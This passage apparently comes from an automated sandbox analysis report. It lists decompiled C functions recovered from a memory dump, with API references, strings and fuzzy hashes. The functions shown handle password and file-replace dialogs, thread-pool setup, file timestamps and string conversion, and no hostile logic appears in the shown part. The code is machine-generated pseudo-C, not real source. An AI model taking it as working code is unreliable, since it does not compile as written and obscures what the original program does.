          • Instruction Fuzzy Hash: 87216D7245030CAEDB20DEA4DE05FFE7BA8AB15700F040026FB14965A2E371D669ABA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 83%
          			E0020A0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
          				short _v260;
          				void* __ebx;
          				void* _t15;
          				signed short _t24;
          				struct HWND__* _t28;
          				intOrPtr _t29;
          				void* _t30;
          
          				_t24 = _a12;
          				_t29 = _a8;
          				_t28 = _a4;
          				if(E001F12D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
          					L10:
          					return 1;
          				}
          				_t30 = _t29 - 0x110;
          				if(_t30 == 0) {
          					SetDlgItemTextW(_t28, 0x67, _a16);
          					goto L10;
          				}
          				if(_t30 != 1) {
          					L5:
          					return 0;
          				}
          				_t15 = (_t24 & 0x0000ffff) - 1;
          				if(_t15 == 0) {
          					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
          					E001FE90C(_t24, 0x245c00,  &_v260);
          					E001FE957( &_v260, 0x80);
          					_push(1);
          					L7:
          					EndDialog(_t28, ??);
          					goto L10;
          				}
          				if(_t15 == 1) {
          					_push(0);
          					goto L7;
          				}
          				goto L5;
          			}











          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 0020A0FE
          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0020A116
          • SetDlgItemTextW.USER32(?,00000067,?), ref: 0020A144
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ItemText$DialogWindow
          • String ID: GETPASSWORD1
          • API String ID: 445417207-3292211884
          • Opcode ID: 43d8da99bf4a2072379ffa8bebd6c53c1341166cf1715fd8d75ba8823d0d0761
          • Instruction ID: 6376121b3f4a9c845e3a614944c0e927a12c43b9c99b51533ba056ca2c30c592
          • Opcode Fuzzy Hash: 43d8da99bf4a2072379ffa8bebd6c53c1341166cf1715fd8d75ba8823d0d0761
          • Instruction Fuzzy Hash: C311083296031DB7DB219EA8AD49FFB7B7CEF09740F400011FA49B24C1C6A599618672
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 70%
          			E001FB1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
          				short _t10;
          				void* _t13;
          				signed int _t14;
          				short* _t20;
          				void* _t23;
          				signed short* _t27;
          				signed int _t29;
          				signed int _t31;
          
          				_t20 = _a8;
          				_t27 = _a4;
          				 *_t20 = 0;
          				_t10 = E001FB4C6(_t27);
          				if(_t10 == 0) {
          					_t29 = 0x5c;
          					if( *_t27 == _t29 && _t27[1] == _t29) {
          						_push(_t29);
          						_push( &(_t27[2]));
          						_t10 = E00210BB8(__ecx);
          						_pop(_t23);
          						if(_t10 != 0) {
          							_push(_t29);
          							_push(_t10 + 2);
          							_t13 = E00210BB8(_t23);
          							if(_t13 == 0) {
          								_t14 = E00212B33(_t27);
          							} else {
          								_t14 = (_t13 - _t27 >> 1) + 1;
          							}
          							asm("sbb esi, esi");
          							_t31 = _t29 & _t14;
          							E00214DDA(_t20, _t27, _t31);
          							_t10 = 0;
          							 *((short*)(_t20 + _t31 * 2)) = 0;
          						}
          					}
          					return _t10;
          				}
          				return E001F3E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
          			}












          APIs
          • _swprintf.LIBCMT ref: 001FB1DE
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • _wcschr.LIBVCRUNTIME ref: 001FB1FC
          • _wcschr.LIBVCRUNTIME ref: 001FB20C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: _wcschr$__vswprintf_c_l_swprintf
          • String ID: %c:\
          • API String ID: 525462905-3142399695
          • Opcode ID: 259a9b2bbb34426422b73e7e2e1061c8492bbc424cf52e8ce976077d4bb6ae59
          • Instruction ID: 5c35c3361a2bc42a31568a434e4d5fce6b4dc7e0da37090e6a189cdf3dd7c39e
          • Opcode Fuzzy Hash: 259a9b2bbb34426422b73e7e2e1061c8492bbc424cf52e8ce976077d4bb6ae59
          • Instruction Fuzzy Hash: 86014913408315799B306B74DCC2D7FA7ECDE667607448406F944C2082FB30E8A4C2B1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 74%
          			E00200326(long* __ecx, long _a4) {
          				void* __esi;
          				void* __ebp;
          				long _t11;
          				void* _t14;
          				long _t23;
          				long* _t25;
          
          				_t19 = __ecx;
          				_t11 = _a4;
          				_t25 = __ecx;
          				_t23 = 0x40;
          				 *__ecx = _t11;
          				if(_t11 > _t23) {
          					 *__ecx = _t23;
          				}
          				if( *_t25 == 0) {
          					 *_t25 = 1;
          				}
          				_t25[0x41] = 0;
          				if( *_t25 > _t23) {
          					 *_t25 = _t23;
          				}
          				_t3 =  &(_t25[0xc8]); // 0x320
          				_t25[0xc5] = 0;
          				InitializeCriticalSection(_t3);
          				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
          				_t14 = CreateEventW(0, 1, 1, 0);
          				_t25[0xc7] = _t14;
          				if(_t25[0xc6] == 0 || _t14 == 0) {
          					_push(L"\nThread pool initialization failed.");
          					_push(0x2300e0);
          					E001F6CC9(E001F6CCE(_t19), 0x2300e0, _t25, 2);
          				}
          				_t25[0xc3] = 0;
          				_t25[0xc4] = 0;
          				_t25[0x42] = 0;
          				return _t25;
          			}










          APIs
          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,001FA865,00000008,00000000,?,?,001FC802,?,00000000,?,00000001,?), ref: 0020035F
          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,001FA865,00000008,00000000,?,?,001FC802,?,00000000), ref: 00200369
          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,001FA865,00000008,00000000,?,?,001FC802,?,00000000), ref: 00200379
          Strings
          • Thread pool initialization failed., xrefs: 00200391
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Create$CriticalEventInitializeSectionSemaphore
          • String ID: Thread pool initialization failed.
          • API String ID: 3340455307-2182114853
          • Opcode ID: 26adb173e0ae2521f4ad751e3475b38fd3165fe6bb1377213119abeb626d0ba1
          • Instruction ID: 89b0997888d2371bc66b6339eac4ff0e0c3fa70aa1f4840e4e8d6a1f645ce728
          • Opcode Fuzzy Hash: 26adb173e0ae2521f4ad751e3475b38fd3165fe6bb1377213119abeb626d0ba1
          • Instruction Fuzzy Hash: 7211A0B1510709EFD3325F669CC8AABFBECEB65344F10482EF1DA82242D7712984CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020C96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
          				long _v0;
          				_Unknown_base(*)()* _t16;
          				int _t22;
          				WCHAR* _t25;
          
          				 *0x24ce10 = _a12;
          				 *0x24ce14 = _a16;
          				 *0x2375f4 = _a20;
          				if( *0x2375d3 == 0) {
          					if( *0x2375d2 == 0) {
          						_t16 = E0020AFB9;
          						_t25 = L"REPLACEFILEDLG";
          						while(1) {
          							_t22 = DialogBoxParamW( *0x230064, _t25,  *0x2375c8, _t16, _a4);
          							if(_t22 != 4) {
          								break;
          							}
          							if(DialogBoxParamW( *0x230060, L"RENAMEDLG",  *0x2375d8, E0020C2A7, _v0) != 0) {
          								break;
          							}
          						}
          						return _t22;
          					}
          					return 1;
          				}
          				return 0;
          			}








          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: RENAMEDLG$REPLACEFILEDLG
          • API String ID: 0-56093855
          • Opcode ID: bd8366c056a0454684123eb889532071ca8ddc690402ecaf646ecac72b10dc04
          • Instruction ID: 6ae01b04361f12ea83b33931046f32b16872433dc219db4570375a66e0f0a1b5
          • Opcode Fuzzy Hash: bd8366c056a0454684123eb889532071ca8ddc690402ecaf646ecac72b10dc04
          • Instruction Fuzzy Hash: 370188F222831ABFC7159F59FD48A23BBE5E745750F100526F941A22B1D7719C30DB61
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 75%
          			E00218749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
          				signed int _v8;
          				signed int _v12;
          				signed int _v16;
          				unsigned int _v20;
          				signed int _v28;
          				signed int _v32;
          				signed int _v36;
          				char _v40;
          				intOrPtr _v48;
          				char _v52;
          				void* __ebx;
          				void* __edi;
          				void* _t86;
          				signed int _t92;
          				signed int _t93;
          				signed int _t94;
          				signed int _t100;
          				void* _t101;
          				void* _t102;
          				void* _t104;
          				void* _t107;
          				void* _t109;
          				void* _t111;
          				void* _t115;
          				char* _t116;
          				void* _t119;
          				signed int _t121;
          				signed int _t128;
          				signed int* _t129;
          				signed int _t136;
          				signed int _t137;
          				char _t138;
          				signed int _t139;
          				signed int _t142;
          				signed int _t146;
          				signed int _t151;
          				char _t156;
          				char _t157;
          				void* _t161;
          				unsigned int _t162;
          				signed int _t164;
          				signed int _t166;
          				signed int _t170;
          				void* _t171;
          				signed int* _t172;
          				signed int _t174;
          				signed int _t181;
          				signed int _t182;
          				signed int _t183;
          				signed int _t184;
          				signed int _t185;
          				signed int _t186;
          				signed int _t187;
          
          				_t171 = __edx;
          				_t181 = _a24;
          				if(_t181 < 0) {
          					_t181 = 0;
          				}
          				_t184 = _a8;
          				 *_t184 = 0;
          				E00213356(0,  &_v52, _t171, _a36);
          				_t5 = _t181 + 0xb; // 0xb
          				if(_a12 > _t5) {
          					_t172 = _a4;
          					_t142 = _t172[1];
          					_v36 =  *_t172;
          					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
          					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
          						L11:
          						__eflags = _t142 & 0x80000000;
          						if((_t142 & 0x80000000) != 0) {
          							 *_t184 = 0x2d;
          							_t184 = _t184 + 1;
          							__eflags = _t184;
          						}
          						__eflags = _a28;
          						_v16 = 0x3ff;
          						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
          						__eflags = _t172[1] & 0x7ff00000;
          						_v32 = _t136;
          						_t86 = 0x30;
          						if((_t172[1] & 0x7ff00000) != 0) {
          							 *_t184 = 0x31;
          							_t185 = _t184 + 1;
          							__eflags = _t185;
          						} else {
          							 *_t184 = _t86;
          							_t185 = _t184 + 1;
          							_t164 =  *_t172 | _t172[1] & 0x000fffff;
          							__eflags = _t164;
          							if(_t164 != 0) {
          								_v16 = 0x3fe;
          							} else {
          								_v16 = _v16 & _t164;
          							}
          						}
          						_t146 = _t185;
          						_t186 = _t185 + 1;
          						_v28 = _t146;
          						__eflags = _t181;
          						if(_t181 != 0) {
          							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
          						} else {
          							 *_t146 = 0;
          						}
          						_t92 = _t172[1] & 0x000fffff;
          						__eflags = _t92;
          						_v20 = _t92;
          						if(_t92 > 0) {
          							L23:
          							_t33 =  &_v8;
          							 *_t33 = _v8 & 0x00000000;
          							__eflags =  *_t33;
          							_t147 = 0xf0000;
          							_t93 = 0x30;
          							_v12 = _t93;
          							_v20 = 0xf0000;
          							do {
          								__eflags = _t181;
          								if(_t181 <= 0) {
          									break;
          								}
          								_t119 = E0020DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
          								_t161 = 0x30;
          								_t121 = _t119 + _t161 & 0x0000ffff;
          								__eflags = _t121 - 0x39;
          								if(_t121 > 0x39) {
          									_t121 = _t121 + _t136;
          									__eflags = _t121;
          								}
          								_t162 = _v20;
          								_t172 = _a4;
          								 *_t186 = _t121;
          								_t186 = _t186 + 1;
          								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
          								_t147 = _t162 >> 4;
          								_t93 = _v12 - 4;
          								_t181 = _t181 - 1;
          								_v20 = _t162 >> 4;
          								_v12 = _t93;
          								__eflags = _t93;
          							} while (_t93 >= 0);
          							__eflags = _t93;
          							if(_t93 < 0) {
          								goto L39;
          							}
          							_t115 = E0020DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
          							__eflags = _t115 - 8;
          							if(_t115 <= 8) {
          								goto L39;
          							}
          							_t54 = _t186 - 1; // 0x213fc1
          							_t116 = _t54;
          							_t138 = 0x30;
          							while(1) {
          								_t156 =  *_t116;
          								__eflags = _t156 - 0x66;
          								if(_t156 == 0x66) {
          									goto L33;
          								}
          								__eflags = _t156 - 0x46;
          								if(_t156 != 0x46) {
          									_t139 = _v32;
          									__eflags = _t116 - _v28;
          									if(_t116 == _v28) {
          										_t57 = _t116 - 1;
          										 *_t57 =  *(_t116 - 1) + 1;
          										__eflags =  *_t57;
          									} else {
          										_t157 =  *_t116;
          										__eflags = _t157 - 0x39;
          										if(_t157 != 0x39) {
          											 *_t116 = _t157 + 1;
          										} else {
          											 *_t116 = _t139 + 0x3a;
          										}
          									}
          									goto L39;
          								}
          								L33:
          								 *_t116 = _t138;
          								_t116 = _t116 - 1;
          							}
          						} else {
          							__eflags =  *_t172;
          							if( *_t172 <= 0) {
          								L39:
          								__eflags = _t181;
          								if(_t181 > 0) {
          									_push(_t181);
          									_t111 = 0x30;
          									_push(_t111);
          									_push(_t186);
          									E0020E920(_t181);
          									_t186 = _t186 + _t181;
          									__eflags = _t186;
          								}
          								_t94 = _v28;
          								__eflags =  *_t94;
          								if( *_t94 == 0) {
          									_t186 = _t94;
          								}
          								__eflags = _a28;
          								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
          								_t174 = _a4[1];
          								_t100 = E0020DAC0( *_a4, 0x34, _t174);
          								_t137 = 0;
          								_t151 = (_t100 & 0x000007ff) - _v16;
          								__eflags = _t151;
          								asm("sbb ebx, ebx");
          								if(__eflags < 0) {
          									L47:
          									 *(_t186 + 1) = 0x2d;
          									_t187 = _t186 + 2;
          									__eflags = _t187;
          									_t151 =  ~_t151;
          									asm("adc ebx, 0x0");
          									_t137 =  ~_t137;
          									goto L48;
          								} else {
          									if(__eflags > 0) {
          										L46:
          										 *(_t186 + 1) = 0x2b;
          										_t187 = _t186 + 2;
          										L48:
          										_t182 = _t187;
          										_t101 = 0x30;
          										 *_t187 = _t101;
          										__eflags = _t137;
          										if(__eflags < 0) {
          											L56:
          											__eflags = _t187 - _t182;
          											if(_t187 != _t182) {
          												L60:
          												_push(0);
          												_push(0xa);
          												_push(_t137);
          												_push(_t151);
          												_t102 = E0020DE00();
          												_v32 = _t174;
          												 *_t187 = _t102 + 0x30;
          												_t187 = _t187 + 1;
          												__eflags = _t187;
          												L61:
          												_t104 = 0x30;
          												_t183 = 0;
          												__eflags = 0;
          												 *_t187 = _t151 + _t104;
          												 *(_t187 + 1) = 0;
          												goto L62;
          											}
          											__eflags = _t137;
          											if(__eflags < 0) {
          												goto L61;
          											}
          											if(__eflags > 0) {
          												goto L60;
          											}
          											__eflags = _t151 - 0xa;
          											if(_t151 < 0xa) {
          												goto L61;
          											}
          											goto L60;
          										}
          										if(__eflags > 0) {
          											L51:
          											_push(0);
          											_push(0x3e8);
          											_push(_t137);
          											_push(_t151);
          											_t107 = E0020DE00();
          											_v32 = _t174;
          											 *_t187 = _t107 + 0x30;
          											_t187 = _t187 + 1;
          											__eflags = _t187 - _t182;
          											if(_t187 != _t182) {
          												L55:
          												_push(0);
          												_push(0x64);
          												_push(_t137);
          												_push(_t151);
          												_t109 = E0020DE00();
          												_v32 = _t174;
          												 *_t187 = _t109 + 0x30;
          												_t187 = _t187 + 1;
          												__eflags = _t187;
          												goto L56;
          											}
          											L52:
          											__eflags = _t137;
          											if(__eflags < 0) {
          												goto L56;
          											}
          											if(__eflags > 0) {
          												goto L55;
          											}
          											__eflags = _t151 - 0x64;
          											if(_t151 < 0x64) {
          												goto L56;
          											}
          											goto L55;
          										}
          										__eflags = _t151 - 0x3e8;
          										if(_t151 < 0x3e8) {
          											goto L52;
          										}
          										goto L51;
          									}
          									__eflags = _t151;
          									if(_t151 < 0) {
          										goto L47;
          									}
          									goto L46;
          								}
          							}
          							goto L23;
          						}
          					}
          					__eflags = 0;
          					if(0 != 0) {
          						goto L11;
          					} else {
          						_t183 = E00218A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
          						__eflags = _t183;
          						if(_t183 == 0) {
          							_t128 = E00220FD0(_t184, 0x65);
          							_pop(_t166);
          							__eflags = _t128;
          							if(_t128 != 0) {
          								__eflags = _a28;
          								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
          								__eflags = _t170;
          								 *_t128 = _t170;
          								 *((char*)(_t128 + 3)) = 0;
          							}
          							_t183 = 0;
          						} else {
          							 *_t184 = 0;
          						}
          						goto L62;
          					}
          				} else {
          					_t129 = E00217ECC();
          					_t183 = 0x22;
          					 *_t129 = _t183;
          					E00217DAB();
          					L62:
          					if(_v40 != 0) {
          						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
          					}
          					return _t183;
          				}
          			}

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: __alldvrm$_strrchr
          • String ID:
          • API String ID: 1036877536-0
          • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
          • Instruction ID: 5e1d44992dfb2df522e530f251caed8d93441eb12bf4a6d16bfc6db774f56f68
          • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
          • Instruction Fuzzy Hash: 4DA157729243869FDB21CE18C8C17FEBBE5EF65350F28416EE4949B382CA348991CB51
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 94%
          			E001F9F96(void* __edx) {
          				signed char _t40;
          				void* _t41;
          				void* _t52;
          				signed char _t70;
          				void* _t79;
          				signed int* _t81;
          				signed int* _t84;
          				void* _t85;
          				signed int* _t88;
          				void* _t90;
          
          				_t79 = __edx;
          				E0020D940();
          				_t84 =  *(_t90 + 0x1038);
          				_t70 = 1;
          				if(_t84 == 0) {
          					L2:
          					 *(_t90 + 0x11) = 0;
          					L3:
          					_t81 =  *(_t90 + 0x1040);
          					if(_t81 == 0) {
          						L5:
          						 *(_t90 + 0x13) = 0;
          						L6:
          						_t88 =  *(_t90 + 0x1044);
          						if(_t88 == 0) {
          							L8:
          							 *(_t90 + 0x12) = 0;
          							L9:
          							_t40 = E001F9E7F( *(_t90 + 0x1038));
          							 *(_t90 + 0x18) = _t40;
          							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
          								_t70 = 0;
          							} else {
          								E001FA12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
          							}
          							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
          							 *(_t90 + 0x14) = _t41;
          							if(_t41 != 0xffffffff) {
          								L16:
          								if( *(_t90 + 0x11) != 0) {
          									E0020082F(_t84, _t79, _t90 + 0x1c);
          								}
          								if( *(_t90 + 0x13) != 0) {
          									E0020082F(_t81, _t79, _t90 + 0x2c);
          								}
          								if( *(_t90 + 0x12) != 0) {
          									E0020082F(_t88, _t79, _t90 + 0x24);
          								}
          								_t85 =  *(_t90 + 0x14);
          								asm("sbb eax, eax");
          								asm("sbb eax, eax");
          								asm("sbb eax, eax");
          								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
          								_t52 = CloseHandle(_t85);
          								if(_t70 != 0) {
          									_t52 = E001FA12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
          								}
          								goto L24;
          							} else {
          								_t52 = E001FB32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
          								if(_t52 == 0) {
          									L24:
          									return _t52;
          								}
          								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
          								 *(_t90 + 0x14) = _t52;
          								if(_t52 == 0xffffffff) {
          									goto L24;
          								}
          								goto L16;
          							}
          						}
          						 *(_t90 + 0x12) = _t70;
          						if(( *_t88 | _t88[1]) != 0) {
          							goto L9;
          						}
          						goto L8;
          					}
          					 *(_t90 + 0x13) = _t70;
          					if(( *_t81 | _t81[1]) != 0) {
          						goto L6;
          					}
          					goto L5;
          				}
          				 *(_t90 + 0x11) = 1;
          				if(( *_t84 | _t84[1]) != 0) {
          					goto L3;
          				}
          				goto L2;
          			}

          APIs
          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001F7F2C,?,?,?), ref: 001FA03C
          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001F7F2C,?,?), ref: 001FA080
          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001F7F2C,?,?,?,?,?,?,?,?), ref: 001FA101
          • CloseHandle.KERNEL32(?,?,00000000,?,001F7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 001FA108
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: File$Create$CloseHandleTime
          • String ID:
          • API String ID: 2287278272-0
          • Opcode ID: 48aaebb5c4448320bfadf116cff5db99c76d7904a39fe7532ad2ee18bb714d71
          • Instruction ID: 452a52ef748126c70844a392e388eb027913820e086bd12b48982eb55d8601be
          • Opcode Fuzzy Hash: 48aaebb5c4448320bfadf116cff5db99c76d7904a39fe7532ad2ee18bb714d71
          • Instruction Fuzzy Hash: F541BF70148389AAE731EE24EC55BAEBBE8AF94700F040919B6D5D31D1C768DA4CDB53
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 85%
          			E0021B5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
          				signed int _v8;
          				int _v12;
          				char _v16;
          				intOrPtr _v24;
          				char _v28;
          				void* _v40;
          				signed int _t34;
          				signed int _t40;
          				int _t46;
          				int _t53;
          				void* _t55;
          				int _t57;
          				signed int _t63;
          				int _t67;
          				short* _t69;
          				signed int _t70;
          				short* _t71;
          
          				_t34 =  *0x22d668; // 0x4319796a
          				_v8 = _t34 ^ _t70;
          				E00213356(__ebx,  &_v28, __edx, _a4);
          				_t57 = _a24;
          				if(_t57 == 0) {
          					_t6 = _v24 + 8; // 0x31e85006
          					_t53 =  *_t6;
          					_t57 = _t53;
          					_a24 = _t53;
          				}
          				_t67 = 0;
          				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
          				_v12 = _t40;
          				if(_t40 == 0) {
          					L15:
          					if(_v16 != 0) {
          						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
          					}
          					return E0020E203(_t67, _v8 ^ _t70);
          				}
          				_t55 = _t40 + _t40;
          				asm("sbb eax, eax");
          				if((_t55 + 0x00000008 & _t40) == 0) {
          					_t69 = 0;
          					L11:
          					if(_t69 != 0) {
          						E0020E920(_t67, _t69, _t67, _t55);
          						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
          						if(_t46 != 0) {
          							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
          						}
          					}
          					L14:
          					E0021980D(_t69);
          					goto L15;
          				}
          				asm("sbb eax, eax");
          				_t48 = _t40 & _t55 + 0x00000008;
          				_t63 = _t55 + 8;
          				if((_t40 & _t55 + 0x00000008) > 0x400) {
          					asm("sbb eax, eax");
          					_t69 = E00217A8A(_t63, _t48 & _t63);
          					if(_t69 == 0) {
          						goto L14;
          					}
          					 *_t69 = 0xdddd;
          					L9:
          					_t69 =  &(_t69[4]);
          					goto L11;
          				}
          				asm("sbb eax, eax");
          				E00220EE0();
          				_t69 = _t71;
          				if(_t69 == 0) {
          					goto L14;
          				}
          				 *_t69 = 0xcccc;
          				goto L9;
          			}

          APIs
          • MultiByteToWideChar.KERNEL32(?,00000000,?,002134E6,00000000,00000000,0021451B,?,0021451B,?,00000001,002134E6,?,00000001,0021451B,0021451B), ref: 0021B637
          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0021B6C0
          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0021B6D2
          • __freea.LIBCMT ref: 0021B6DB
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
          • String ID:
          • API String ID: 2652629310-0
          • Opcode ID: bd87c9202ac56bee3cb365c306e12f40a58e19e211b0957f6f061b91d0a7961c
          • Instruction ID: 5594b324701cd3d2a048dede80c6892471019902910c228b2bb3b19bd7fcd8f2
          • Opcode Fuzzy Hash: bd87c9202ac56bee3cb365c306e12f40a58e19e211b0957f6f061b91d0a7961c
          • Instruction Fuzzy Hash: F531CE72A2025AABDF258F65DC45DEE7BF9EB60310F054128FC04DA191E736DDA1CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
